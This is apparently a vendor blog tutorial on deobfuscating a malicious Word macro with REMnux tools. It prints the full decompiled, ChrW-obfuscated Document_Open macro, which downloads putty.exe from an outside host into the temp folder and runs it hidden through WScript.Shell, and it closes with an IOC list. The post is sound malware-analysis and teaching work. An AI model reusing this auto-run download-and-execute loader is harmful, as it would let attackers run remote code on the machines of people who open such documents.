Unraveling Obfuscated Macros in Office Files:A Step-by-Step Guide

Phishing attacks are one of the most common security threats in the digital world today. In recent years, there has been a trend of malicious actors using Office files to make their targets more sophisticated. Office files are files that users frequently use in their daily work life, such as Word documents, Excel spreadsheets and PowerPoint presentations. However, malicious code hidden within these files aims to trick users into stealing sensitive information or damaging their systems.

Malicious macros or embedded scripts placed inside the file cause the user to run malicious code without realizing it. This code can be used to download malware onto computers, steal user credentials or damage the system.

Docguard will deobfuscate the macros in a sample malicious document.

Example Analysis

We start the analysis by first learning the format of this file.

or we can use the oleid tool to get a rough idea of the content of the document.

That information tells us that the file is MS Word 97-2003 type. Now let’s list the entries of the malicious document. Olefile can list entries in the file.

We know from Oleid that there are VBA macros in this document. Then VBA code has to be in one of the entries. We can use the Oledump tool to see which entry has these macros. We can use the Oledump tool to see which entry these macros are in. The Oledump can list the entries in the file and show which entry has a macro.

We see that there is a data of size 33591 in Section 7. When we want to get its content as a string, we get raw data. We think that this data should be pcode. So we used the pcode2code tool for decompile the VBA codes.

root@remnux:/home/remnux/Desktop/samples# pcode2code 764f7e371e424d7c184a9c45ec3df43fa7f7f29fcffe2e4e4296359c6d603dad 
XLMMacroDeobfuscator: pywin32 is not installed (only is required if you want to use MS Excel)
stream : Macros/VBA/ThisDocument - 33591 bytes

Sub Document_Open()
  Dim RgLPrQli As Object
  Dim RMCFLnUE As Object
  Dim vZmGcZxF As Object
  Dim BxxyBpnb As String
  Dim IBXTqgQE As String
  Dim ywYyjmaR As String
  BxxyBpnb = ChrW(104) & ChrW(116) & ChrW(116) & ChrW(112) & ChrW(115) & ChrW(58) & ChrW(47) & ChrW(47) & ChrW(115) & ChrW(109) & ChrW(109) & ChrW(115) & ChrW(102) & ChrW(46) & ChrW(99) & ChrW(111) & ChrW(109) & ChrW(47) & ChrW(112) & ChrW(117) & ChrW(116) & ChrW(116) & ChrW(121) & ChrW(46) & ChrW(101) & ChrW(120) & ChrW(101)
  IBXTqgQE = Environ(ChrW(84) & ChrW(69) & ChrW(77) & ChrW(80))
  ywYyjmaR = IBXTqgQE & ChrW(92) & ChrW(112) & ChrW(117) & ChrW(116) & ChrW(116) & ChrW(121) & ChrW(46) & ChrW(101) & ChrW(120) & ChrW(101)
  Set RgLPrQli = CreateObject(ChrW(77) & ChrW(105) & ChrW(99) & ChrW(114) & ChrW(111) & ChrW(115) & ChrW(111) & ChrW(102) & ChrW(116) & ChrW(46) & ChrW(88) & ChrW(77) & ChrW(76) & ChrW(72) & ChrW(84) & ChrW(84) & ChrW(80))
  Set RMCFLnUE = CreateObject(ChrW(65) & ChrW(68) & ChrW(79) & ChrW(68) & ChrW(66) & ChrW(46) & ChrW(83) & ChrW(116) & ChrW(114) & ChrW(101) & ChrW(97) & ChrW(109))
  Set vZmGcZxF = CreateObject(ChrW(87) & ChrW(83) & ChrW(99) & ChrW(114) & ChrW(105) & ChrW(112) & ChrW(116) & ChrW(46) & ChrW(83) & ChrW(104) & ChrW(101) & ChrW(108) & ChrW(108))
  RgLPrQli.Open ChrW(71) & ChrW(69) & ChrW(84), BxxyBpnb, False
  RMCFLnUE.Type = 1
  RMCFLnUE.Write RgLPrQli.responseBody
  RMCFLnUE.SaveToFile ywYyjmaR, 2
  Set RMCFLnUE = Nothing
  Set RgLPrQli = Nothing
  vZmGcZxF.Run ywYyjmaR, 0
  Set vZmGcZxF = Nothing
  MsgBox ChrW(70) & ChrW(105) & ChrW(108) & ChrW(101) & ChrW(32) & ChrW(100) & ChrW(111) & ChrW(119) & ChrW(110) & ChrW(108) & ChrW(111) & ChrW(97) & ChrW(100) & ChrW(101) & ChrW(100) & ChrW(32) & ChrW(116) & ChrW(111) & ChrW(32) & ChrW(116) & ChrW(101) & ChrW(109) & ChrW(112) & ChrW(111) & ChrW(114) & ChrW(97) & ChrW(114) & ChrW(121) & ChrW(32) & ChrW(102) & ChrW(111) & ChrW(108) & ChrW(100) & ChrW(101) & ChrW(114) & ChrW(32) & ChrW(97) & ChrW(110) & ChrW(100) & ChrW(32) & ChrW(101) & ChrW(120) & ChrW(101) & ChrW(99) & ChrW(117) & ChrW(116) & ChrW(101) & ChrW(100) & ChrW(46)
End Sub

 We got the compiled VBA macro, but we see it is obfuscated code. We have to de-obfuscate to understand this code

So, let’s convert the long code into a shorter version by converting it one by one as follows.

Then, the original string values will help us to make meaningless variable names meaningful.

The putty file in the link is the original putty file that has been checksum checked in version 0.78

The code shows that putty.exe was being downloaded from a site and the putty program was opened using the run command WScript.Shell on the system.


  • File Name: eee.docx
  • File MD5: 8b121c0f1cbf66486e5113feffc93dbf
  • https[:]//smmsf.com/putty.exe


Comments are closed.